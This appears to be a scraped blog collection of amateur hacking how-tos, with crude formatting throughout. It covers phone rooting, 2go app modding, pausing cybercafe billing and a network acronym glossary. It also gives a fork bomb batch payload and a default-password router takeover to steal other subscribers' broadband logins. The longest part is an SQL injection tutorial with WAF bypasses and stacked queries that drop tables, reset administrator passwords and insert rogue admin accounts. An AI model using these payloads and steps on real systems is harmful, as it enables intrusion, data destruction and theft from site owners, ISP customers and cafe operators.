ATTACHMENT LINK SnapPea. exe
ADB Driver installer
Root _ with _ Restore _by _Bin4 ry _v 13 .zip
STEP 1 . Install ADB Driver
installer ,launch the software after
installing and connect your phone to your
pc . enable USB
DEBUG MODE .
2 . Click the '' install'' button. .wait for
process to complete .
3 . Install snapPea(will ask to install on
phone too,accept
installation ) and wait for it to install at
same time install
required drivers for your device. if
successfull snapPea
will detect your phone /manage device..
4 . Unpack ''
Root _ with _ Restore _by _Bin4 ry _v 13 .zip '' to
any
folder / location on you pc,
5 . Run /Execute the '' RUNME .bat'' file , A
command prompt
will open,
6 . Just enter 1 as your option. It will now
do its task .
You ’ll now see something like this on
your device.
7 . Click restore and wait for the process
to finish .
8 . Restore data , ignore that encryption
password thing
While on the command prompt window,
you ’ll see this br /> 9 . rooting ….
Your device will restart , and if you see
the SUPER SU icon
on your apps drawer it means that you
had successfully
rooted the phone .
DONE !!!!!!!!!
Goto Playstore and download the
'' RootChecker" and check
root access

HOW TO ROOT SAMSUNG GALAXY 52 RUNNING ON ICS 4.0.3


Pre -Requirement To Root
Samsung Galaxy S 2
Should be charged atleast 60 %
Make a backup of all the data like
messages, call history, pictures etc
before rooting process . (For safety )
USB driver Should be installed .
How To Root Samsung
Galaxy S 2 Running On
ICS 4 .0 .3
Download Samsung Kies & Install it on
your window Pc .
Download Odin 3v 185 this file is need
to root your Samsung Galaxy S 2 .
Download the CF Rooting Files (Don ’t
Extract It). This file will flash Kernel to
root the device.
1 . Extract the ODIN zip & Run Odin
1 . 85 and leave it open .
2 . Turn off your Samsung Galaxy S 2
i 9100 and put it in Download Mode by
pressing Volume Down + Menu
Button + Power Button [ Your phone
will be bootup into Download Mode]
3 . Press Volume Up to execute
Downloading between your Galaxy S 2
and your computer.
4 . Connect your Micro -USB cable with
Galaxy S 2 & PC
5 . A yellow box should appear in Odin
signifying that your Galaxy S 2
is successfully communicating to your
computer
6 . Now Tick this Two check box Auto
Reboot & F .Reset Time.
7 . Tick the check box which in left side
of PDA button , then click on PDA
button & choose the CF Rooting Files
which you downloaded Earlier.
8 . Now Finally click on the Start
Button & rooting process will start.
Note :- Don 't disconnect the usb cable
untill the your device boot up .]
That ’ s It! Congrats , You have
Successfully Rooted Your Samsung
Galaxy S 2 Running on ICS 4 . 03
If you encountered any problem while
following the above rooting method,
feel free to ask me by leaving a
comment bellow.
Also Don’t forget to share your
feedback , after successfully rooting
your Galaxy S2 . .
please encourage me before droping your
testimonies and iniviting ur frndz

How to mod your own 2go

Its very easy
if u will undastnd this ebook . ...
Appz needed
mini halo , blueftp, class
editor &translator ,2 go .zip
STEP 1 create a
folder & name it
2 go _mod .. ..
STEP 2 open ur
blueftp & locate the
2 go .zip .. .den open d 2 go. zip [u wl
c d contents in d 2go e . g
twogo . class etc ] & press menu then scroll
down &
choose "select all"
STEP3  extract the files to the
2 go _mod folder then exit .. ...
STEP 4 Now open ur class
translator & locate the following files
" BELOW "& edit
them to ur taste and press
option then save and afta dt
press close[ sumfn wl pop up 4 u
2 save original file of dt press
" N0 " n kip pressing Yes until iz done. ..
STEP5 Here are d filez
u will edit=> NOTE=> DONT LEAVE
ANY SPARE FILE *changing 2go
& 2 go interactive at start
page=>> am .class * changing
window notes=> aq. class * changing error
statement " cannot connect to
2 go "=>av. class * 2 go login page
& changing words =>az .class
* changing words like
logging ,reconnecting ,starting 2go ,2 go
news =>>Twogo.class YOU
CAN ALSO CHECK THIS
CLASSES = bb. class,c .class ,n .class
and edit them then exit ur
class translator after editting. .. .
STEP 6 = Now open ur "Mini halo " locate
" file
explorer " and
locate ur 2go _mod folder n plz
don 't open it jst press " option"
then choose compress folder .. ..
It wl ask 4 new file name ,. .now
rename to 2 gov3 mod _ by_ ur
name .zip . ..now
press " ok " then
keep pressing "Yes " then it
finishes it's compressing, then
exit .. . STEP 7 = open ur blueftp &
locate new_ 2 go_ mod _by _ur
name .zip and rename it to 2 go_ mod _by _ur
name _jar then
exit & rename it to . jar NOW
ENJOY UR MOD. .. ... .. .pls ur comment is
needed

How to crack your java S40 to start minimizing

Make Sure You Drop Your
Comment Here Before u leave
STEPS
1 . DOWNLOAD JAF ON YOUR PC .
2 . Connect your phone with pc
in
pc suite mode.
3 . Open JAF and go to BB5 Tab.
4 . Tick the following. ( a) Read
PP .
( b )Normal mode. ( c) CRT 308
( Already Ticked ).
5 . Now click service.
6 . Save the * PP file on Pc
7 . Open the * pp file in Note
pad .
8 . In case if the phone is (a )
Nokia s4 o V 3 then search for
281 line and change it to 282.
( b )Nokia s40 V 5 or V 6 then
search for 48 and change it to
482 . ( c ) in case ther is no 48 or
28 then add the appropriate
line
ie 48 2 or 28 2 .
9 . Save the * PP
10 . Open JAF > BB 5 Tab.
11 . Tick the following; ( a )
upload
PP ( b ) Normal mode C R T -308
( Already Ticked )
12 . Click on service .
13 . Select the * pp file.
14 . After it shows down select
Normal mode from the drop
down menu .
15 . Phone will restart and show
test in RNDIS USB mode ? press
No . This popup will be shown
on
every restart this is normal.
Now i have succesfully disabled
the Nokia security wall. Edit
java
Application . STEPS 1 . Copy the
java ( .jar ) application to the
computer. 2 . Open the ( .jar ) file
wit Win RAR . 3 . Browse to
meta -
inf folder and open it. 4 .open
the
manifest . MF file in note pad. 5 .
At the end of the codes add this
( Nokia - MIDlet- no- exit: true ).

How to pause your time when browsing in a cafe

1. Download the software here
2. Open it and locate the name of the cafe's time biller e.g cyberlock etc and right click on it, then click on pause
3. Minimize and use.

How to create a fork bomb virus

Its just too easy; just follow the following steps
1. Open notepad on your pc and write this code into it %0|%0
2. Then save it with a .bat extension when saving, delete the .txt and input the file name and the
.bat extension e.g fork.bat
3. Once anyone will double click on this bat file, his system will jamn and crash
If you are already a victim of this virus, once you ON your pc, quickly press ctrl+alt+delete key on your keyboard then start the task manager, now click on the processes tab and locate fork.bat or any name you used, then put your mouse on it and click on the end process button. That's all.

Friday, 1 November 2013

Network acronyms

Networking Acronyms and
Terminology
may 17, 2012 @ 11:11 am by hackingmanual
This is a list of basic computer networking
acronyms and terminology. It is a first draft
and I will continue to update it and add more
information and terms.
LAN - Local Area Network usually a single
building or campus
WAN- Connects lans up to global in scale
(internet)
MAN - Metro area network City Wide Network
SAN Data storage network
PAN Devices around a persons work area, PDA
Keybord mouse.
NIC - Network interface card
NOS - Network operating system- windows
server, linux, unix netware
Terminator - resistive load at the end of the
network cable that blocks reflection and
reduces noise
Repeater - network amplifier repeats all
incoming packets as broadcast to all
connections
Bridge - connects two similar networks
Gateway - connects two dissimilar networks
Router- same as gateway but only for
routeable protocols can also direct network
traffic.
B router - router only able to support a single
protocol
Hub - network splitter, broadcasts all incoming
packets to all ports
Passive- no active componenets splits signal to
all ports, only one per segment, terminate
unused ports
Active - powered hub amplifies signal while
broadcasting to all ports.
Switch Splits network and provides and
provides direction to network packets
Node device that connects to network
NAS Network attached storage
Collision Detecion and Avoidance
- CSMA/CA
-Carrier Sense Multiple Access/Collision
Avoidance
-Node checks network for other broadcasts
before transmitting
-CSMA/CD
-Carrier Sense Multiple Access/Collision
Detection
-Node broadcasts and waits for reply or time
out
Token passing
-Only the node with an empty token can
broadcast
-Every node handles every token
-Time sharing ensures every node gets equal
time
MAU -Multistation Access Unit, Allows devices
to attach to token ring network
Network Administrator -Responsible for
maintaining network hardware, software, and
users.
IPX- Internet Packet eXchange
ISP -Internet Service Provider
UNC -Universal Naming Convention
POTS -Plain Old Telephone Service
TCP/IP -Transmission Control Protocol/Internet
Protocol
SLIP -Serial Line Internet Protocol
PPP-Point-to-Point Protocol
DUN - Dial Up Network
UTP -Unshielded Twisted Pair
STP- Shielded Twisted Pair or Spanning Tree
Protocol
Protocol -Set of rules telling devices on
network how to communicate
Topology - Physical and logical layout of
network
VLAN- virtual local area network
DHCP – Dynamic Host Configuration Protocol
VPN – virtual private network
SSL – secure sockets layer

Blackhat SEO Posioning attack

Blackhat SEO poisoning attacks
Recently , i have reported that Google Image
search and Bing Image search leads to
malware sites especially a blackhole exploit
kit page. The reason behind this attack is SEO
Poisoning.
What is SEO?
Search engine optimization (SEO) is a
collection of techniques to improve the
visibility of a website in a search engine's
search results. Some of the techniques used
by webmasters in
What is BlackHat SEO?
Black Hat SEO , also known as SEO poisoning,
is a illegal-technique used by cyber criminals
to make their links appear higher than
legitimate results. When a user search for
related keywords, the infected links appear in
the top of the search results
Hacker use one of the following techniques:
*Creating SEO-friendly fake pages related to
poplar search topics on compromised sites
*Cloak malicious content from sphiders and
security researchers.
* Iframe injection
Poisoning Image search Results:
As most of search engines filter and find the
text-based seo poisoning attacks, Cyber
criminals now poisoning the Image search
results instead.
They hacked legitimate sites and inject
malicoius code. Whenever a person click the
Image of compromised site in the search
result , it will redirect him to malware sites.
Sophos reports that bing image-search results
are being poisoned more than other search
engines.
Learn more about SEO Poisoning :
here

How to hack your broadband

Step 1: Download any port Scanner (i preffer Super Scan or IPscanner) Step 2: First Get your ip from CODE www.whatismyip.com Asume your IP to be 59.x.x.17 Step 3: copy your ip in IPscanner Software and scan for alive IPs in the below range start:59.x.x.1 to End:59.x.x.255 Step 4: Then check in your scanner which alive IPs has the port 80 open Step 5: Enter that alive IP in your web browser Step 6: It asks for user , pass Type u User=admin Password=admin or password It is the default password for most of the routers. if denied then use on another alive IP Step 7: If success then it will show router settings page of tht IP user There goto Home -> Wan Setting and the username and password of his account will appear there. Step 8: use ShowPassword or Revelation software to view the password in asterisks Now You have Username/Password Enjoy!

SQL injection tutorial all common SQL problems and their solutions

Hello readers of Vercetti's blog, Today I'll write an tutorial for you what covers most problems while doing SQL injection and solutions to them. Probably every person who has looked at tutorials to hack a website have noticed that there are too much SQL tutorials. Almost every forum has 10 tutorials and blogs 5 tutorials about SQL injection, but actually those tutorials are stolen from somewhere else and the author doesn't probably even know why does SQL injection work. All of those tutorials are like textbooks with their ABC's and the result is just a mess. Everyone are writing tutorials about SQL, but nobody covers the problems what will come with that attack. What is the cause of most problems related to SQL injection? Webdevelopers aren't always really dumb and they have also heard of hackers and have implemented some security measures like WAF or manual protetion. WAF is an Web application firewall and will block all malicous requests, but WAF's are quite easy to bypass. Nobody would like to have their site hacked and they are also implementing some security, but ofcourse it would be false to say that if we fail then it's the servers fault. There's also a huge possibility that we're injecting otherwise than we should. A web application firewall (WAF) is an appliance, server plugin, or filter that applies a set of rules to an HTTP conversation. Generally, these rules cover common attacks such as Cross-site Scripting (XSS) and SQL Injection. By customizing the rules to your application, many attacks can be identified and blocked. The effort to perform this customization can be significant and needs to be maintained as the application is modified. If you're interested about WAF's and how they're working then I suggest to read it from wikipedia http://en.wikipedia.org/wiki/ Application_firewall Order by is being blocked? It rarely happens, but sometimes you can't use order by because the WAF has blocked it or some other reasons. Unfortunally we can't skip the order by and we have to find another way. The way is simple, instead of using Order by we have to use Group by because that's very unlikely to be blacklisted by the WAF. If that request will return 'forbidden' then it means it's blocked. http://site.com/gallery?id=1 order by 100-- Then you have to try to use Group by and it will return correct : http://site.com/gallery?id=1 group by 100-- / success Still there's an possibility that WAF will block the request, but there's on other way also and that's not very widely known. It's about using ( the main query ) = (select 1) http://example.org/news.php?id=8 and (select * from admins)=(select 1) Then you'll probably recive an error like this : Operand should contain 5 column(s) . That error means there are 5 columns and it means we can proceed to our next step what's union select. The command was different than usual, but the further injection will be the same. http://site.com/news.php?id=-8 union select 1,2,3,4,5-- 'order by 10000' and still not error? That's an small chapter where I'll tell you why sometimes order by won't work and you don't see an error. The difference between this capther and the last one is that previously your requests were blocked by the WAF, but here's the injection method is just a littlebit different. When I saw that on my first time then I thought how does a Database have 100000 columns because I'm not getting the error while the site is vulnerable? The answer is quite logical. By trying order by 1000000 we're not getting the error because there are so many columns in there, we're not getting the error because our injecting isn't working. Example : site.com/news.php?id=9 order by 10000000000-- [No Error] to bypass this you just have to change the URL littlebit.Add ' after the ID number and at the end just enter + Example : site.com/news.php?id=9' order by 10000000--+[Error] If the last example is working for you then it means you have to use it in the next steps also, there isn't anything complicated, but to make everything clear I'll still make an example. http://site.com/news.php?id=-9' union select 1,2,3,4,5,6,7,8--+ Extracting data from other database. Sometimes we can inject succesfully and there doesn't appear any error, it's just like a hackers dream. That dream will end at the moment when we'll see that there doesn't exist anything useful to us. There are only few tables and are called "News", "gallery" and "articles". They aren't useful at all to us because we'd like to see tables like "Admin" or "Administrator". Still we know that the server probably has several databases and even if we have found the information we're looking for, you should still take a look in the other databases also. This will give you Schema names. site.com/news.php?id=9 union select 1,2,group_concat(schema_name),4 from information_schema.schemata And with this code you can get the tables from the schema. site.com/news.php?id=9 union select 1,2,group_concat(table_name),4 from information_schema.tables where table_schema=0x This code will give you the column names. site.com/news.php?id=9 union select 1,2,group_concat(column_name),4 from information_schema.tables where table_schema=0x and table_name=0x I get error if I try to extract tables. site.com/news.php?id=9 union select 1,2,group_concat(table_name),4 from information_schema.tables Le wild Error appears. "you have an error in your sql syntax near '' at line 1" Change the URL for this site.com/news.php?id=9 union select 1,2,concat(unhex(hex(table_name),4 from information_schema.tables limit 0,1-- How to bypass WAF/Web application firewall The biggest reason why most of reasons are appearing are because of security measures added to the server and WAF is the biggest reason, but mostly they're made really badly and can be bypassed really easily. Mostly you will get error 404 like it's in the code below, this is WAF. Most likely persons who're into SQL injection and bypassing WAF's are thinking at the moment "Dude, only one bypassing method?", but in this case we both know that bypassing WAF's is different kind of science and I could write a ebook on bypassing these. I'll keep all those bypassing queries to another time and won't cover that this time. "404 forbidden you do not have permission to access to this webpage" The code will look like this if you get the error http://www.site.com/index.php? id=-1+union+select+1,2,3,4,5-- [Error] Change the url Like it's below. http://www.site.com/index.php?id=-1+/ *!UnIoN*/+/*!sELeCt*/1,2,3,4,5-- [No error] Is it possible to modify the information in the database by SQL injection? Most of people aren't aware of it, but it's possible. You're able to Update, Drop, insert and select information. Most of people who're dealing with SQL injection has never looked deeper in the attack than shown in the average SQL injection tutorial, but an average SQL injection tutorial doesn't have those statements added. Most likely because most of people are copy&pasting tutorials or just overwriting them. You might ask that why should one update, drop or insert information into the database if I can just look into the information to use the current ones, why should we make another Administrator account if there already exists one? Reading the information is just one part of the injection and sometimes those other commands what are quite infamous are more powerful than we thought. If you have read all those avalible SQL injection tutorials then you're probably aware that you can read the information, but you didn't knew you're able to modify it. If you have tried SQL injecting then you have probably faced some problems that there aren't administrator account, why not to use the Insert command to add one? There aren't admin page to login, why not to drop the table and all information so nobody could access it? I want to get rid of the current Administrator and can't change his password, why not to use the update commands to change the password of the Administrator? You have probably noticed that I have talked alot about unneccesary information what you probably don't need to know, but that's an information you need to learn and understand to become a real hacker because you have to learn how SQL databases are working to fiqure it out how those commands are working because you can't find tutorials about it from the network. It's just like math you learn in school, if you won't learn it then you'll be in trouble when you grow up. Theory is almost over and now let's get to the practice. Let's say that we're visiting that page and it's vulnerable to SQL injection. http://site.com/news.php?id=1 You have to start injecting to look at the tables and columns in them, but let's assume that the current table is named as "News". With SQL injection you can SELECT, DROP, UPDATE and INSERT information to the database. The SELECT is probably already covered at all the tutorials so let's focus on the other three. Let's start with the DROP command. I'd like to get rid of a table, how to do it? http://site.com/news.php?id=1; DROP TABLE news That seems easy, we have just dropped the table. I'd explain what we did in the above statement, but it's quite hard to explain it because you all can understand the above command. Unfortunally most of 'hackers' who're making tutorials on SQL injection aren't aware of it and sometimes that three words are more important than all the information we can read on some tutorials. Let's head to the next statement what's UPDATE. http://site.com/news.php?id=1; UPDATE 'Table name' SET 'data you want to edit' = 'new data' WHERE column_name='information'-- Above explanation might be quite confusing so I'll add an query what you're most likely going to use in real life : http://site.com/news.php?id=1; UPDATE 'admin_login' SET 'password' = 'Crackhackforum' WHERE login_name='Rynaldo'-- We have just updated Administrator account's password.In the above example we updated the column called 'admin_login" and added a password what is "Crackhackforum" and that credentials belongs to account which's username is Rynaldo. Kinda heavy to explain, but I hope you'll understand. How does INSERT work? Luckily "INSERT" isn't that easy as the "DROP" statement is, but still quite understandable. Let's go further with Administrator privileges because that's what most of people are heading to. Adding an administrator account would be like this : http://site.com/news.php?id=1; INSERT INTO 'admin_login' ('login_id', 'login_name', 'password', 'details') VALUES (2,'Rynaldo','Crackhackforum','NA')-- INSERT INTO 'admin_login' means that we're inserting something to 'admin_login'. Now we have to give instructions to the database what exact information we want to add, ('login_id', 'login_name', 'password', 'details') means that the specifications we're adding to the DB are Login_id, Login_name, password and details and those are the information the database needs to create a new account. So far we have told the database what information we want to add, we want to add new account, password to it, account ID and details. Now we have to tell the database what will be the new account's username, it's password and account ID, VALUES (2,'Rynaldo','Crackhackforum','NA')-- . That means account ID is 2, username will be Rynaldo, password of the account will be Crackhackforum. Your new account has been added to the database and all you have to do is opening up the Administrator page and login. Passwords aren't working Sometimes the site is vulnerable to SQL and you can get the passwords.Then you can find the sites username and password, but when you enter it into adminpanel then it shows "Wrong password".This can be because those usernames and passwords are there, but aren't working. This is made by site's admin to confuse you and actually the Cpanel doesn't contain any username/password. Sometimes are accounts removed, but the accounts are still in the database. Sometimes it isn't made by the admin and those credentials has been left in the database after removing the login page, sometimes the real credentials has been transfered to another database and old entries hasn't been deleted. Sometimes i get some weird password This weird password is called Hash and most likely it's MD5 hash.That means the sites admin has added more security to the website and has encrypted the passwords.Most popular crypting way is using MD5 hash.The best way to crack MD5 hashes is using PasswordsPro or Hashcat because they're the best and can crack the password even if it's really hard or isn't MD5. Also you can use http://md5decrypter.com .I don't like to be a person who's pitching around with small details what aren't correct, but here's an tip what you should keep in mind. The domain is saying it's "md5decryptor" what reffers to decrypting MD5 hashes. Actually it's not possible to decrypt a hash because they're having 'one-way' encryption. One way encryption means it can only be encrypted, but not decrypted. Still it doesn't mean that we can't know what does the hash mean, we have to crack it. Hashes can't be decrypted, only cracked. Those online sites aren't cracking hashes every time, they're saving already cracked hashes & results to their database and if you'll ask an hash what's already in their database, you will get the result. :) Md5 hash looks like this : 827ccb0eea8a706c4c34a16891f84e7b = 12345 You can read about all Hashes what exist and their description http://pastebin.com/ aiyxhQsf Md5 hashes can't be decrypted, only cracked How to find admin page of site? Some sites doesn't contain admin control panel and that means you can use any method for finding the admin page, but that doesn't even exist. You might ask "I got the username and password from the database, why isn't there any admin login page then?", but sometimes they are just left in the database after removing the Cpanel. Mostly people are using tools called "Admin page finders".They have some specific list of pages and will try them.If the page will give HTTP response 200 then it means the page exists, but if the server responds with HTTP response 404 then it means the page doesn't exist in there.If the page exist what is in the list then tool will say "Page found".I don't have any tool to share at the moment, but if you're downloading it yourself then be beware because there are most of those tools infected with virus's. Mostly the tools I mentioned above, Admin Page Finders doesn't usually find the administrator page if it's costumly made or renamed. That means quite oftenly those tools doesn't help us out and we have to use an alternative and I think the best one is by using site crawlers. Most of you are probably having Acunetix Web Vulnerability scanner 8 and it has one wonderful feature called site crawler. It'll show you all the pages on the site and will %100 find the login page if there exists one in the page. Automated SQL injection tools. Automated SQL injection tools are programs what will do the whole work for you, sometimes they will even crack the hashes and will find the Administrator page for you. Most of people are using automated SQL injection tools and most popular of them are Havij and SQLmap. Havij is being used much more than SQLmap nomatter the other tool is much better for that injection. The sad truth why that's so is that many people aren't even able to run SQLmap and those persons are called script-kiddies. Being a script-kiddie is the worstest thing you can be in the hacking world and if you won't learn how to perform the attack manually and are only using tools then you're one of them. If you're using those tools to perform the attack then most of people will think that you're a script-kiddie because most likely you are. Proffesionals won't take you seriusly if you're injecting with them and you won't become a real hacker neither. My above text might give you an question, "But I've seen that even Proffesional hackers are using SQLmap?" and I'd like to say that everything isn't always black & white. If there are 10 databases, 50 tables in them and 100 columns in the table then it would just take days to proccess all that information.I'm also sometimes using automated tools because it makes my life easier, but to use those tools you first have to learn how to use those tools manually and that's what the tutorial above is teaching you. Use automated tools only to make your life easier, but don't even look at them if you don't know how to perform the attack manually. What else can I do with SQL injection besides extracting information? There are many things besides extracting information from the database and sometimes they are much more powerful. We have talked above that sometimes the database doesn't contain Administrator's credentials or you can't crack the hashes. Then all the injection seems pointless because we can't use the information we have got from the database. Still we can use few another methods. Just like we can conduct CSRF attack with persistent XSS, we can also move to another attacks through SQL injection. One of the solution would be performing DOS attack on the website which is vulnerable to SQL injection. DOS is shortened from Denial of service and it's tottaly different from DDOS what's Distributed Denial of Service. I think that you all probably know what these are, but if I'm taking that attack up with a sentence then DOS will allow us to take down the website temporarely so users wouldn't have access to the site. The other way would be uploading our shell through SQL injection. If you're having a question about what's shell then by saying it shortly, it's a script what we'll upload to the server and it will create an backdoor for us and will give us all the privileges to do what we'd like in the server and sometimes by uploading a shell you're having more rights to modify things than the real Administrator has. After you have uploaded a shell you can move forward to symlink what means we can deface all the sites what are sharing the same server. Shelling the website is probably most powerful thing you can use on the website. I have not covered how to upload a shell through SQL injection and haven't covered how to cause DOS neither, but probably will do in my next tutorials because uploading a shell through SQL is another kind of science, just like bypassing WAF's. Those are the most common methods what attackers will put in use after they can't get anything useful out of the database. Ofcourse every website doesn't have the same vulnerabilities and they aren't responding always like we want and by that I mean we can't perform those attacks on all websites.We have all heard that immagination is unlimited and you can do whatever you'd like. That's kinda true and hacking isn't an exception, there are more ways than I can count. What to do if all the information doesn't display on the page? I actually have really rarely seen that there are so much information on the webpage that it all just don't fit in there, but one person recently asked that question from me and I decided to add it here. Also if you're having questions then surely ask and I'll update the article. If we're getting back to the question then the answer is simple, if all the information can't fit in the screen then you have to look at the source code because everything displayed on the webpage will be in there. Also sometimes information will appear in the tab where usually is the site's name. If you can't see the information then sometimes it's hiddened, but with taking a deeper look you might find it from the source. That's why you always have to look all the solutions out before quiting because sometimes you might think "I can't inject into that..", but actually the answer is hiddened in the source. What is the purpose of '--' in the union +select+1,2,3,4,5-- ? I suggest to read about null-byte's and here's a good explanation about it : http:// en.wikipedia.org/wiki/Null_character because it might give you some hint why -- is being used . Purpose of adding -- in the end of the URL isn't always neccesary and it depends on the target. It doesn't have any influence to the injection because it doesn't mean anything, but it's still being used because it's used as end of query. It means if I'm injecting as : http://site.com/news.php?id=-1 union select 1,2,3,4,5-- asasdasd then the server will skip everything after -- and asasdasd won't be readed. It's just like adding to masking a shell. Sometimes injection isn't working if -- is missing because -- tells the DB that "I'm the end of query, don't read anything what comes after me and execute everything infront of me". It's just like writing a sentence without a dot, people might think it's not the end of your sentence and will wait until you write the other part of the sentence and the end will come if you add the dot to your sentence.